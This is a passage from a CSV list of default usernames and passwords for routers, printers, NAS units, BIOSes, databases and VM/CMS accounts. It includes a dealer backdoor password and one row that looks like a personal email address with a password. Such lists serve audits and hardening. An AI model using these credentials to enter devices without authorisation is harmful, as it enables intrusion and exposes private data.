bm,VM/CMS,,Multi,OPERATOR,OPERATOR,,,\nibm,VM/CMS,,Multi,PDMREMI,,,,\nibm,VM/CMS,,Multi,PENG,,,,\nibm,VM/CMS,,Multi,PROCAL,,,,\nibm,VM/CMS,,Multi,PRODBM,,,,\nibm,VM/CMS,,Multi,PROMAIL,,,,\nibm,VM/CMS,,Multi,PSFMAINT,,,,\nibm,VM/CMS,,Multi,PVM,,,,\nibm,VM/CMS,,Multi,RDM470,,,,\nibm,VM/CMS,,Multi,ROUTER,,,,\nibm,VM/CMS,,Multi,RSCS,,,,\nibm,VM/CMS,,Multi,RSCSV2,,,,\nibm,VM/CMS,,Multi,SAVSYS,,,,\nibm,VM/CMS,,Multi,SFCMI,,,,\nibm,VM/CMS,,Multi,SFCNTRL,,,,\nibm,VM/CMS,,Multi,SMART,,,,\nibm,VM/CMS,,Multi,SQLDBA,,,,\nibm,VM/CMS,,Multi,SQLUSER,,,,\nibm,VM/CMS,,Multi,SYSADMIN,,,,\nibm,VM/CMS,,Multi,SYSCKP,,,,\nibm,VM/CMS,,Multi,SYSDUMP1,,,,\nibm,VM/CMS,,Multi,SYSERR,,,,\nibm,VM/CMS,,Multi,SYSWRM,,,,\nibm,VM/CMS,,Multi,TDISK,,,,\nibm,VM/CMS,,Multi,TEMP,,,,\nibm,VM/CMS,,Multi,TSAFVM,,,,\nibm,VM/CMS,,Multi,VASTEST,,,,\nibm,VM/CMS,,Multi,VM3812,,,,\nibm,VM/CMS,,Multi,VMARCH,,,,\nibm,VM/CMS,,Multi,VMASMON,,,,\nibm,VM/CMS,,Multi,VMASSYS,,,,\nibm,VM/CMS,,Multi,VMBACKUP,,,,\nibm,VM/CMS,,Multi,VMBSYSAD,,,,\nibm,VM/CMS,,Multi,VMMAP,,,,\nibm,VM/CMS,,Multi,VMTAPE,,,,\nibm,VM/CMS,,Multi,VMTLIBR,,,,\nibm,VM/CMS,,Multi,VMUTIL,,,,\nibm,VM/CMS,,Multi,VSEIPO,,,,\nibm,VM/CMS,,Multi,VSEMAINT,,,,\nibm,VM/CMS,,Multi,VSEMAN,,,,\nibm,VM/CMS,,Multi,VTAM,,,,\nibm,VM/CMS,,Multi,VTAM,VTAM,,,\nibm,VM/CMS,,Multi,VTAMUSER,,,,\nibm,a20m,,,,admin,,,\nibm,a20m,,Admin,,admin,,,\nibm,a20m,,Multi,,admin,Admin,,\nibm,management hw,,Multi,USERID,PASSW0RD,admin,,\nibm,management hw,,admin,USERID,PASSW0RD,,,\nibm,routers,,router,msmadhuastro@gmail.com,06725A1201,,,\nibm,switch,8275-217,Telnet,admin,,Admin,,\niinet,Bob Lite,,10.1.1.1,,admin,Admin,,\niinet,Bob,,10.1.1.1,,admin,Admin,,\niinet,Bob2,,10.1.1.1,,admin,Admin,,\nimai,Traffic Shaper,TS-1012,HTTP,,,Admin,default IP 1.2.3.4,\nimperiasoftware,Imperia Content Managment System,,,superuser,superuser,,Unix/NT,\ninedo,Proget,,,Admin,Admin,,,\ninformix,Database,,,informix,informix,,,\ninfosmart,SOHO router,,HTTP,admin,0,Admin,,\ninfotec,IS 2320,,web interface,admin,,,,\ninfotec,ISC2525,System v1.67 / NIB v5.14 / WIM v1.10,http://192.168.0.100,admin,,Admin,,\ninfotec,infotec IS 2416L,,http://192.168.1.102,,,admin,,\ninfrant,ReadyNAS RAIDiator,3.01c1-p1 to -p6,,admin,infrant1,administrator,,\ninfrant,ReadyNAS RAIDiator,3.01c1-p1 to -p6,,root,see note,,root password is generated on each boot with a hardcoded algorithm and the password cannot be permanently changed - once discovered it will always work after the device is rebooted,\ninnovaphone,IP 20,,,admin,ip20,,,\ninnovaphone,IP 21,,,admin,ip21,,,\ninnovaphone,IP 3000,,,admin,ip3000,,,\ninnovaphone,IP 305,,,admin,ip305Beheer,,,\ninnovaphone,IP 400,,,admin,ip400,,,\ninnovaphone,IP20,,Admin,admin,ip20,,,\ninnovaphone,IP20,,Multi,admin,ip20,Admin,,\ninnovaphone,IP3000,,Admin,admin,ip3000,,,\ninnovaphone,IP3000,,Multi,admin,ip3000,Admin,,\ninnovaphone,IP305,,,admin,ip305Beheer,,,\ninnovaphone,IP400,,Admin,admin,ip400,,,\ninnovaphone,IP400,,Multi,admin,ip400,Admin,,\nintegraltechnologies,RemoteView,4,Console,Administrator,letmein,Admin,,\nintegratednetworks,IP Phone,IN1002,HTTP,Administrator,1234,Admin,,\nintegratednetworks,IP Phone,IN1002,HTTP,Administrator,12345678,Admin,,\nintegratednetworks,IP Phone,IN1002,HTTP,Administrator,19750407,Admin,,\nintel,Express 520T Switch,,,setup,setup,,,\nintel,Express 520T Switch,,Multi,setup,setup,User,,\nintel,Express 520T Switch,,User,setup,setup,,,\nintel,Express 9520 Router,,,NICONEX,NICONEX,,,\nintel,Express 9520 Router,,Multi,NICONEX,NICONEX,User,,\nintel,Express 9520 Router,,User,NICONEX,NICONEX,,,\nintel,LanRover VPN Gateway,,6.0 >,,shiva,,,\nintel,LanRover VPN Gateway,,< 6.0,,isolation,,,\nintel,LanRover VPN Gateway,6.0+,multi,,shiva,Admin,,\nintel,LanRover VPN Gateway,below 6.0,multi,,isolation,Admin,,\nintel,LanRover,6.7,Console,root,admin,Admin,,\nintel,NetporrExpress,,,,,,,\nintel,NetporrExpress,,Admin,,,,,\nintel,Netstructure,480t,Telnet,admin,,Admin,,\nintel,Shiva Access Port,All,Telnet,admin,hello,Admin,,\nintel,Shiva LanRover,,,Guest,,User,,\nintel,Shiva LanRover,,Multi,root,,Admin,,\nintel,Shiva Lanrovers,,,root,,,,\nintel,Shiva Lanrovers,,Admin,root,,,,\nintel,Shiva Mezza ISDN Router,All,Telnet,admin,hello,Admin,,\nintel,Shiva,,,Guest,,,,\nintel,Shiva,,,root,,,,\nintel,Shiva,,Admin,root,,,,\nintel,Shiva,,Multi,Guest,,User,,\nintel,Shiva,,User,Guest,,,,\nintel,Wireless AP 2011,,2.21,,Intel,,,\nintel,Wireless AP 2011,,Admin,,Intel,,,\nintel,Wireless AP 2011,2.21,Multi,,Intel,Admin,,\nintel,Wireless Gateway,,3.x,intel,intel,,,\nintel,Wireless Gateway,,Admin,intel,intel,,,\nintel,Wireless Gateway,3.x,HTTP,intel,intel,Admin,,\nintel,intel,,,khan,kahn,,,\nintel,intel,1,Multi,khan,kahn,,,\nintel,lan rover,,6.7,root,admin,,,\nintel,lan rover,,Admin,root,admin,,,\nintel,netstructure,,480t,admin,,,,\nintel,netstructure,,Admin,admin,,,,\nintellicom,Netbiter webSCADA WS100,All,http://10.10.10.35,admin,admin,HICP Network Configuration Service,,\nintellicom,Netbiter webSCADA WS200,All,http://10.10.10.35,admin,admin,HICP Network Configuration Service,,\nintellitouch,ITC3002 VoIP Telephone Deskset,,HTTP/phone,administrator,1234,Admin,,\ninterbase,Interbase Database Server,,Admin,SYSDBA,masterkey,,,\ninterbase,Interbase Database Server,,All,SYSDBA,masterkey,,,\ninterbase,Interbase Database Server,All,Multi,SYSDBA,masterkey,Admin,,\ninterfaceware,Iguana,,,admn,password,,,\nintermec,501,,console,,1138,setup,,\nintermec,EasyLAN,,10i2,,intermec,,,\nintermec,EasyLAN,10i2,HTTP,,intermec,Admin,,\nintermec,Mobile LAN,5.25,Multi,intermec,intermec,Admin,,\nintermec,PF2i,,Multi,admin,pass,Admin,,\nintermec,PF4i PM4i,,,admin,pass,admin,,\ninternetarchive,Heritrix,1.6.0,,admin,letmein,Admin,,\nintershop,Intershop,,4,operator,$chwarzepumpe,,,\nintershop,Intershop,,Admin,operator,$chwarzepumpe,,,\nintershop,Intershop,4,HTTP,operator,$chwarzepumpe,Admin,,\nintersystems,Cache Post-RDMS,,,system,sys,,,\nintersystems,Cache Post-RDMS,,Console,system,sys,Admin,Change immediately,\nintex,organizer,,,,,,,\nintex,organizer,,Admin,,,,,\nintex,organizer,,Multi,,,Admin,,\nintuit,Quickbooks,,1.0,admin,(no-default-password),,,\nintuit,Quickbooks,,2.0,admin,(no-default-password),,,\nintuit,Quickbooks,,2004,admin,(no-default-password),,,\nintuit,Quickbooks,,2005,admin,(no-default-password),,,\nintuit,Quickbooks,,2006,admin,(no-default-password),,,\nintuit,Quickbooks,,2007,admin,(no-default-password),,,\nintuit,Quickbooks,,2008,admin,(no-default-password),,,\nintuit,Quickbooks,,2009,admin,(no-default-password),,,\nintuit,Quickbooks,,2010,admin,(no-default-password),,,\nintuit,Quickbooks,,2011,admin,(no-default-password),,,\nintuit,Quickbooks,,3.0,admin,(no-default-password),,,\nintuit,Quickbooks,,4.0,admin,(no-default-password),,,\nintuit,Quickbooks,,5.0,admin,(no-default-password),,,\nintuit,Quickbooks,,6.0,admin,(no-default-password),,,\nintuit,Quickbooks,,Enterprise 1.0,admin,(no-default-password),,,\nintuit,Quickbooks,,Enterprise 10.0,admin,(no-default-password),,,\nintuit,Quickbooks,,Enterprise 11.0,admin,(no-default-password),,,\nintuit,Quickbooks,,Enterprise 4.0,admin,(no-default-password),,,\nintuit,Quickbooks,,Enterprise 5.0,admin,(no-default-password),,,\nintuit,Quickbooks,,Enterprise 6.0,admin,(no-default-password),,,\nintuit,Quickbooks,,Enterprise 7.0,admin,(no-default-password),,,\nintuit,Quickbooks,,Enterprise 8.0,admin,(no-default-password),,,\nintuit,Quickbooks,,Enterprise 9.0,admin,(no-default-password),,,\ninventelwanadoo,LiveBox,D34A,,Admin,Admin,Admin,,\nipstar,240cm Dish and Indoor Unit,,http://192.168.5.100:8080/xWebGateway.cgi,ADMIN,operator,Admin,,\nipstar,84cm Dish and Indoor Unit,,http://192.168.5.100:8080/xWebGateway.cgi,ADMIN,operator,Admin,,\nipstar,iPSTAR Network Box,v.2+,HTTP,admin,operator,Admin,iPSTAR Network Box is used by the CSLoxInfo Broadband Satellite system.,\nipstar,iPSTAR Satellite Router/Radio,v2,HTTP,admin,operator,Admin,For CSLoxInfo and iPSTAR Customers,\nipswitch,WS_FTP Server,,,XXSESS_MGRYY,X#1833,,,\nipswitch,WS_FTP Server,,,XXSESS_MGRYY,X#1833,Admin,User's realname: Local Session Manager,\nipswitch,Whats up Gold 6.0,,,admin,admin,,Windows 9x a,\nipswitch,WhatsUp Gold,,,admin,admin,,,\nipswitch,WhatsUp Gold,,,guest,,,,\niqinvision,IQeye,,,root,system,,,\nirc,IRC Daemon,,,,FOOBAR,,,\nirc,IRC Daemon,,IRC,,FOOBAR,,,\nironport,C30,,,admin,ironport,,,\nironport,C30,,http,admin,ironport,Admin,,\nironport,Messaging Gateway Appliance,,Multi,admin,ironport,Admin,,\nironport,S650,,https,admin,ironport,,,\niso sistemi,winwork,,,,,,,\niso sistemi,winwork,,Admin,,,,,\niwill,PC BIOS,,,,iwill,,,\niwill,PC BIOS,,Admin,,iwill,,,\niwill,PC BIOS,,Console,,iwill,Admin,,\njaht,adsl router,AR41/2A,HTTP,admin,epicrouter,Admin,,\njamfsoftware,Casper Suite,,,jamfsoftware,jamfsw03,,,\njanitza,UMG 508,,,Homepage Password,0th,,,\njanitza,UMG 508,,,admin,Janitza,,,\njanitza,UMG 508,,,guest,Janitza,,,\njanitza,UMG 508,,,user,Janitza,,,\njaspersoft,Corporation Jasper Reports Server,,,demo,demo,,,\njaspersoft,Corporation Jasper Reports Server,,,jasperadmin,jasperadmin,,,\njaspersoft,Corporation Jasper Reports Server,,,joeuser,joeuser,,,\njaspersoft,Corporation Jasper Reports Server,,,superuser,superuser,,,\njd edwards,WorldVision/OneWorld,,Admin/SECOFR,JDE,JDE,,,\njd edwards,WorldVision/OneWorld,,All(?),JDE,JDE,,,\njdedwards,WorldVision/OneWorld,,Multi,PRODDTA,PRODDTA,Admin,Owner of database tables and objects,\njdedwards,WorldVision/OneWorld,All(?),Console,JDE,JDE,Admin/SECOFR,,\njdedwards,WorldVision/OneWorld,All(?),TCP 1964,JDE,JDE,Admin/SECOFR,,\njds microprocessing,Hydra 3000,,Admin,hydrasna,,,,\njds microprocessing,Hydra 3000,,r2.02,hydrasna,,,,\njdsmicroprocessing,Hydra 3000,r2.02,Console,hydrasna,,Admin,,\njeanphilippelang,Redmine,,,admin,admin,,,\njetform,Jetform Design,,,Jetform,,,,\njetform,Jetform Design,,Admin,Jetform,,,,\njetform,Jetform Design,,HTTP,Jetform,,Admin,,\njetway,PC BIOS,,,,spooml,,,\njetway,PC BIOS,,Admin,,spooml,,,\njetway,PC BIOS,,Console,,spooml,Admin,,\njohnson controls,HVAC System,,,johnson,control,,,\njohnsoncontrols,HVAC System,,modem,johnson,control,,,\njoss technology,PC BIOS,,,,57gbzb,,,\njoss technology,PC BIOS,,,,technolgi,,,\njoss technology,PC BIOS,,Admin,,57gbzb,,,\njoss technology,PC BIOS,,Admin,,technolgi,,,\njosstechnology,PC BIOS,,Console,,57gbzb,Admin,,\njosstechnology,PC BIOS,,Console,,technolgi,Admin,,\njuniper,All,,,root,,,Junos 4.4,\njuniper,CMS,All versions,https,root,juniper,admin access,,\njuniper,ISG2000,,Multi,netscreen,netscreen,Admin,Just a note - netscreen is now made by Juniper - otherwise no change,\njuniper,Junos Space,,,admin,abc123,,,\njuniper,Junos Space,,,super,juniper123,,,\njuniper,NetScreen-25,,192.168.1.1,netscreen,netscreen,Admin,,\njuniper,NetScreen-5GT,,192.168.1.1,netscreen,netscreen,Admin,,\njuniper,Peribit,,,admin,peribit,Admin,,\njuniper,SRX100,,192.168.1.1,root,,Admin,,\njuniper,SRX210,,192.168.1.1,root,,Admin,,\njuniper,SSG 140,,192.168.1.1,netscreen,netscreen,Admin,,\njuniper,SSG 20,,192.168.1.1,netscreen,netscreen,Admin,,\njuniper,SSG 5,,192.168.1.1,netscreen,netscreen,Admin,,\njuniper,ScreenOS,All,ssh or http,netscreen,netscreen,admin,,\njuniper,all mode,7.6R1.9,http://118.98.171.65,,,root,administrator juniper,\njustin hagstrom,AutoIndex,,1.3.2,admin,admin,,,\njustin hagstrom,AutoIndex,,1.3.2,test,test,,,\njustinhagstrom,AutoIndex,1.3.2,,admin,admin,Admin,,\njustinhagstrom,AutoIndex,1.3.2,,test,test,,,\nkalatel,Calibur DSR-2000e,,Multi,,3477,Admin,,\nkalatel,Calibur DSR-2000e,,on-screen menu system,,8111,restore factory defaults,,\nkaptest,usmle,,,admin,,,,\nkaptest,usmle,,Admin,admin,,,,\nkaptest,usmle,,HTTP,admin,,Admin,,\nkentico,Software Kentico CMS for ASP.NET,,,administrator,,,,\nkethinov,Kboard Forum,,0.3.x,root,password,,,\nkethinov,Kboard Forum,0.3.x,SQL,root,password,Admin,,\nkeyscan,Keyscan System V,,admin,keyscan,KEYSCAN,,,\nkeyscan,Keyscan System V,5.2,Console,keyscan,KEYSCAN,admin,,\nkodak,MIM,,,PLMIMService,NetServer,,,\nkodak,MIM,,,RNIServiceManager,NetServer,,,\nkodak,MIM,,,SA,PASSWORD,,,\nkodak,MIM,,,Service,Service,,,\nkodak,PACS,,,PACSLinkIP,NetServer,,,\nkonica minolta,7255,,admin,,sysadm,,,\nkonicaminolta,1690MF,1,web,,sysAdmin,root,,\nkonicaminolta,1690MF,1.0,web,,sysAdmin,root,,\nkonicaminolta,204c,A08E-V100- 1,http://192.168.0.192,admin,,admn,accsess cannat password,\nkonicaminolta,2430DL,all versions,,,administrator,administrative access,Current password listed on this site is wrong. Correct default password is \"\"administrator\"\" fully spelled out all lower case.,\nkonicaminolta,2430DL,all versions,,,administrator,administrative access,Current password listed on this site is wrong. Correct default password is \"administrator\" fully spelled out all lower case.,\nkonicaminolta,4650,,HTTP,admin,administrator,admin,,\nkonicaminolta,554e,,control panel,,1234567812345678,admin,,\nkonicaminolta,5550,,Front Panel,,0,Maintenance mode,,\nkonicaminolta,7216,7216,http,,sysadm,Admin,,\nkonicaminolta,7255,,Multi,,sysadm,admin,,\nkonicaminolta,BH 215,,,,sysadm,,,\nkonicaminolta,BIZHUB 7272 / IP-511A,Type A,IP,,sysadm,admin,,\nkonicaminolta,BizHUB 160(f),,HTTP,N/A,sysadm,,,\nkonicaminolta,Bizhub 600,,Admin,KM,12345678,Admin,,\nkonicaminolta,Bizhub C10,,http,,MagiMFP,Admin,,\nkonicaminolta,Bizhub C10,magicolor 2490MF,,,,MagiMFP,2016-10-31,\nkonicaminolta,Bizhub C20,,,,0,,,\nkonicaminolta,Bizhub C20,,,,000000,,,\nkonicaminolta,Bizhub C224e,all,http,,1234567812345678,Admin,,\nkonicaminolta,Bizhub C25,Current ver Septemebr 2011,ip of printer,Administrator,administrator,Admin,The manual of the printer sais '000000' as default password; i had to use 'administrator',\nkonicaminolta,Bizhub C252,all,http://192.168.0.1,console,,12345678,Administrator,\nkonicaminolta,Bizhub c360,,,Administrator,12345678,,,\nkonicaminolta,Bizhub,200,HTTP,,12345678,Admin,,\nkonicaminolta,C20,,http://xxx.xxx.xxx.xxx,Administrator,Administrator,from the login webpage,,\nkonicaminolta,C253,,Console,,12345678,admin,Tried what was listed at url and it worked on device :http://www.fixya.com/support/t888192-konica_minolta_bizbub_c253,\nkonicaminolta,C350,,,,0,,often either 00000000 or 12345678 on all KM printers,\nkonicaminolta,C350,,,,00000000,,often either 00000000 or 12345678 on all KM printers,\nkonicaminolta,C352,,console/network,,12345678,,,\nkonicaminolta,C364,-,lokal,-,1234567812345678,admin,,\nkonicaminolta,C454,,,,1234567812345678,,,\nkonicaminolta,Di 2010f,,HTTP,,0,Admin,Printer configuration interface,\nkonicaminolta,Di3510,,web,,0,,,\nkonicaminolta,Di3510,,web,,00000000,,,\nkonicaminolta,Di470,,Admin Panel,,0,admin,,\nkonicaminolta,Di470,,Admin Panel,,0000,admin,,\nkonicaminolta,Ineo250,,,administrator,0,,,\nkonicaminolta,Magiccolor 4690MF,all,http,,sysadm,Administrator,,\nkonicaminolta,Magicolor 2450,,front panel,,KM2450,,,\nkonicaminolta,Magicolor 2530DL,,,,administrator,,,\nkonicaminolta,Magicolor 4695MF,,Point webbrowser to printer's IP.,,administrator,Administrator,,\nkonicaminolta,Magicolor 5450D,All versions,HTTP,admin,,,,\nkonicaminolta,Magicolor 5550,,Font Panel,,KMM5550,Service mode,,\nkonicaminolta,Magicolor 7450ii,All ?,Printer console,,KMM7450,Service Menu,,\nkonicaminolta,Magicolor 8650,?,Console,,12345678,Admin menu,anyone know the service password for this model?,\nkonicaminolta,bizhub 163/211,bizhub 163/211,http,,sysadm,administrator,,\nkonicaminolta,bizhub 420,,console,,12345678,,,\nkonicaminolta,bizhub 501,,xxx.xxx.xxx.xxx,,12345678,Admin,,\nkonicaminolta,bizhub C10,1,http://172.16.68.19/,,,admin,,\nkonicaminolta,bizhub C20,,,administrator,administrator,Admin,,\nkonicaminolta,bizhub C220,,http,,12345678,admin,,\nkonicaminolta,bizhub C30P,,Front Panel,,0000,Maintainance Menu,,\nkonicaminolta,bizhub C30P,,Front Panel,,KMBC30P,Service Menu,,\nkonicaminolta,bizhub C554e,,http,administrator,12345678,,,\nkonicaminolta,bizhub C650,all versions,console,Administrator,12345678,system settings,Touch Utility/Counter,touch Administrator settings\nkonicaminolta,bizhub c203,all,all,,12345678,,,\nkonicaminolta,bizhub200,,http://19.168.1.116,01,1057,,,\nkonicaminolta,c284,,,,1234567812345678,,,\nkonicaminolta,di3510,all versions,10.10.10.21,,,admin,,\nkonicaminolta,magicolor 2300 DL,,Multi,,1234,Admin,,\nkonicaminolta,magicolor 2430DL,All,Multi,,,Admin,Taken from reference manual for product,\nkonicaminolta,pagepro 5650,,http,,administrator,admin,,\nkpn,ADSL,,,(username),welkom01,Business ADSL Access,See http://www.h-online.com/security/news/item/Dutch-ISP-finds-120-000-ADSL-accounts-with-default-passwords-1633549.html,\nkragerenergibredbnd,mozilla firefoz,802.11G - 2,4ghz,BREDBNDKABEL,ADMIN,,11G 2,\nkronos,Workforce Central,,,SuperUser,kronites,,,\nkti,KS-2260,,Telnet,superuser,123456,special CLI,can be disabled by renaming the regular login name to superuser,\nkti,KS2260,,Console,admin,123,Admin,,\nkti,KS2600,,Console,admin,123456,Admin,,\nkyocera,1028mfp / 1128mfp,,panel,2800,2800,system menus,change IP; reset counters etc.,\nkyocera,6970DN,,http://,,admin00,,,\nkyocera,EcoLink,,7.2,,PASSWORD,,,\nkyocera,EcoLink,,Admin,,PASSWORD,,,\nkyocera,EcoLink,7.2,HTTP,,PASSWORD,Admin,,\nkyocera,FS- 5XXX,,http://,,admin00,,,\nkyocera,FS-1020D,,HTTP,admin,,Admin,,\nkyocera,FS-1020D,,HTTP,admin,admin,Admin,,\nkyocera,FS-1028MFP,,192.168.1.69,2800,2800,admin,,\nkyocera,FS-1028MFP,,http,,admin00,,,\nkyocera,FS-1128MFP,,,,admin00,,,\nkyocera,FS-1130 MFP,,,Admin,Admin,,,\nkyocera,FS-1130MFP,,192.168.44.222,admin,!orbp2e,admin,,\nkyocera,FS-1135MFP,,DHCP,Admin,admin00,,,\nkyocera,FS-1135MFP,,Panel,3500,3500,,,\nkyocera,FS-1350DN,,http://,,admin00,,,\nkyocera,FS-1370-DN,2L0_3000.003.001 (all Versions),http,,admin00,Admin,,\nkyocera,FS-1370DN,,Display Menu,http://,,admin00,,\nkyocera,FS-2100DN,,http://,Admin,Admin,,,\nkyocera,FS-2135dn,,http://,Admin,Admin,Admin,,\nkyocera,FS-3040MFP+,,Panel,4000,4000,,,\nkyocera,FS-3920DN,,Web,,admin00,,,\nkyocera,FS-3920DN,All,http,,admin00,Admin,Not in the manual!,\nkyocera,FS-4020 DN,,HTTP,/,admin00,,,\nkyocera,FS-4020DN,,http://192.168.0.1,,admin00,Admin,,\nkyocera,FS-4200DN,,Webinterface,Admin,Admin,,,\nkyocera,FS-6025MFP,,,2500,2500,Admin,web interface,\nkyocera,FS-C2026MFP,,http,,admin00,Administrator,,\nkyocera,FS-C2126,,webpage,,admin00,need to click on login button first,,\nkyocera,FS-C5100DN,,http,,admin00,,,\nkyocera,FS-C5250DN,,,,admin00,,According to manual should be \"\"5200\"\",\nkyocera,FS-C5400DN,,,,admin00,,,\nkyocera,FS-C8020MFP,2KZ_2F00.004.019,http://192.168.1.103,Admin,Admin,,DeviceAdmin-2000,\nkyocera,FS-C8520MFP,,,Admin,Admin,,,\nkyocera,FS-C8525MFP,,http://,Admin,Admin,Admin priviledges in Command Center RX,Allows the user to modify settings relating to network,scanning etc\nkyocera,FS3140MFP,,Web Interface,,admin00,Administrator,,\nkyocera,FS6025MFP,,system menus,Admin,Admin,Admin,,\nkyocera,Intermate LAN FS Pro 10/100,K82_0371,HTTP,admin,admin,Admin,,\nkyocera,KM-4850W,,,admin,,,,\nkyocera,TASKalfa 250 Ci,,,Admin,admin00,,if enable local authentification,\nkyocera,TASKalfa 250ci,,IP,,admin00,,,\nkyocera,TASKalfa 266ci,,Console Panel,Admin,Admin,Admin,,\nkyocera,TASKalfa 300ci,,Web interface,,admin00,,,\nkyocera,TASKalfa 3050ci,all versions,web interface,Admin,Admin,Admin,,\nkyocera,TASKalfa 400ci,all versions,HTTP,,admin00,Admin,,\nkyocera,TASKalfa 400ci,all versions,local,Admin,Admin,supervisor-level access,Username and password are case sensitive,\nkyocera,TASKalfa 420i,,http,,admin00,web access admin rights,,\nkyocera,TASKalfa 4500i,,,Admin,Admin,,,\nkyocera,TaskALFA 181 KX,,,Admin,Admin,,,\nkyocera,TaskAlfa 4500I,,Console,4500,4500,Admin,,\nkyocera,TaskAlfa 520i,All versions,Console,5200,5200,Machine Administrator,,\nkyocera,Taskalfa 221,,console,,2200,,,\nkyocera,Taskalfa 250ci,,console,2500,2500,,control panel access,\nkyocera,Taskalfa i300,,web-access/tray,admin00/3000,admin00/3000,admin,,\nkyocera,Telnet Server IB-20/21,,,root,root,,,\nkyocera,Telnet Server IB-20/21,,Admin,root,root,,,\nkyocera,Telnet Server IB-20/21,,multi,root,root,Admin,,\nkyocera,ecosys M2035dn,,Web,Admin,Admin,,,\nkyocera,fs-1028mfp,,,,,,,\nkyoceramita44copystar,New models (cs-4500,etc,intro late 2011,all,browser,Admin (case sensitive),Admin (case sensitive),Administrator\nlacie,2Big Network,,,admin,admin,admin console,,\nlacie,Ethernet Big Disk,,ftp://EthernetBD,admin,admin,Big Disk Administration,,\nlacie,Ethernet Disk Mini 500GB,,,admin,admin,Admin,,\nlacie,Ethernet Disk Mini,all sizes,http://edmini,admin,admin,Administrator's Console,,\nlacie,Ethernet Disk RAID,1.4,HTTP,admin,storage,Manager console,,\nlacie,Ethernet Disk,,multi,,admin,Administrator password,,\nlacie,Ethernet Disk,,multi,myuser,myuser,Default user has access to default public folder,,\nlacie,INNS04-4200-LAC,V1.1C,192.168.1.29,admin,admin,Admin,,\nlacie,lacie ethernet Disk,,,administrator,admin,,,\nlancom,IL11,,Multi,,,Admin,,\nlanier,5618,,,,sysadm,,,\nlanier,5618,,Multi,,sysadm,,,\nlanier,LD120d,,web,Administrator,password,admin,,\nlanier,mpc 2500,1,Deault ip,admin,LEAVE ME BLANK,,,\nlanier,mpc 2500,1.,Deault ip,admin,LEAVE ME BLANK,,,\nlansa,LANSA,,,WEBADM,password,,,\nlansa,aXes,,,admin,admin,,,\nlansa,aXes,,,dev,dev,,,\nlantronics,Lantronics Terminal Server,,,,access,,,\nlantronics,Lantronics Terminal Server,,Admin,,access,,,\nlantronics,Lantronics Terminal Server,,Admin,,system,,,\nlantronix,ETS16P,,,,,,,\nlantronix,ETS16P,,Multi,,,Admin,secondary priv. password: system,\nlantronix,ETS16PR,,,,,,,\nlantronix,ETS32PR,,,,,,,\nlantronix,ETS32PR,,Multi,,,Admin,secondary priv. password: system,\nlantronix,ETS422PR,,,,,,,\nlantronix,ETS422PR,,Multi,,,Admin,secondary priv. password: system,\nlantronix,ETS4P,,,,,,,\nlantronix,ETS4P,,Multi,,,Admin,secondary priv. password: system,\nlantronix,LPS1-T Print Server,,,any,system,,j11-16,\nlantronix,LSB4,,,any,system,,any,\nlantronix,Lantronix Terminal,,,,lantronix,,,\nlantronix,Lantronix Terminal,,Admin,,lantronix,,,\nlantronix,SCS100,,,,access,,,\nlantronix,SCS100,,Multi,,access,Admin,secondary priv. password: system,\nlantronix,SCS1620,,,sysadmin,PASS,,,\nlantronix,SCS1620,,Multi,sysadmin,PASS,Admin,9600/N/8/1 XON/XOFF,\nlantronix,SCS200,,,,admin,,,\nlantronix,SCS200,,Multi,,admin,Admin,secondary priv. password: system,\nlantronix,SCS3200,,,login,access,,,\nlantronix,SCS3200,,,login,access,Admin,secondary port settings login: root password: system,\nlantronix,SCS400,,,,admin,,,\nlantronix,SCS400,,Multi,,admin,Admin,secondary priv. password: system,\nlantronix,SecureLinux Console Manager (SLC),,http/ssh,sysadmin,PASS,Admin,,\nlantronix,Terminal Server,,TCP 7000,,access,Admin,,\nlantronix,Terminal Server,,TCP 7000,,lantronix,Admin,,\nlatisnetwork,border guard,,Multi,,,Admin,,\nleading edge,PC BIOS,,,,MASTER,,,\nleading edge,PC BIOS,,Admin,,MASTER,,,\nleadingedge,PC BIOS,,Console,,MASTER,Admin,,\nlenel,,,System Administration,sa,sa,,,\nlenel,OnGuard,,http - tcp 9999,admin,admin,Admin,,\nlevel1,WAP_002,,,admin,admin,Administrator,,\nlevelone,FBR-1161,,192.168.1.254,admin,admin,Admin,,\nlevelone,FBR-1411TX,,192.168.123.254,admin,admin,Admin,,\nlevelone,FBR-1412TX,,192.168.123.254,admin,password,Admin,,\nlevelone,FBR-1415TX,,192.168.123.254,,admin,Admin,,\nlevelone,FBR-1416A,,192.168.0.1,admin,password,Admin,,\nlevelone,FBR-1418TX,,192.168.123.254,,admin,Admin,,\nlevelone,FBR-1430,,192.168.0.1,admin,password,Admin,,\nlevelone,FBR-1461A,,192.168.1.254,admin,admin,Admin,,\nlevelone,FBR-4000,,192.168.1.1,admin,,Admin,,\nlevelone,WAP-3000,,http://192.168.0.254,admin,password,admin,,\nlevelone,WAP_002,,,admin,admin,Administrator,,\nlevelone,WBR-3402A,,192.168.123.254,,admin,Admin,,\nlevelone,WBR-3404TX,,192.168.123.254,,admin,Admin,,\nlevelone,WBR-3405TX,,192.168.1.1,admin,admin,Admin,,\nlevelone,WBR-3406,,192.168.123.254,,admin,Admin,,\nlevelone,WBR-5400 MIMO,,192.168.123.254,,,Admin,,\nlevelone,WBR-6000,,192.168.0.1,admin,password,Admin,,\nlg,Aria iPECS,All,Console,,jannie,maintenance,dealer backdoor password,\nlg,LAM200E / LAM200R,,Multi,admin,epicrouter,Admin,,\nlg,LAM200E / LAM200R,,Multi,admin,epicrouter,admin,,\nlg,lsp340,,,,6278,,,\nlgic,Goldstream,,,LR-ISDN,LR-ISDN,,,\nlgic,Goldstream,,2.5.1,LR-ISDN,LR-ISDN,,,\nlgic,Goldstream,2.5.1,,LR-ISDN,LR-ISDN,,,\nliebert,Rack PDU Card (RPC),,,Liebert,Liebert,,,\nlinksys,2700v ADSL Router,,,,epicrouter,Admin,,\nlinksys,ADSL Router,,2700v,,epicrouter,,,\nlinksys,ADSL2MUE,,192.168.1.1,admin,admin,Admin,,\nlinksys,AG 241 - ADSL2 Gateway with 4-Port Switch,,Multi,admin,admin,Admin,,\nlinksys,AG041,,192.168.1.1,,admin,Admin,,\nlinksys,AG241,,192.168.1.1,admin,admin,Admin,ADSL2 Gateway with 4-Port Switch,\nlinksys,AG300,,192.168.1.1,admin,admin,Admin,,\nlinksys,AG310,,192.168.1.1,admin,admin,Admin,,\nlinksys,AM300,,192.168.1.1,admin,admin,Admin,,\nlinksys,AP 1120,,Multi,,,Admin,,\nlinksys,BEFSR41,,,,admin,,,\nlinksys,BEFSR41,,192.168.1.1,admin,admin,,,\nlinksys,BEFSR41,2,HTTP,,admin,Admin,,\nlinksys,BEFSR7(1) OR (4),,,,admin,,,\nlinksys,BEFSR7(1) OR 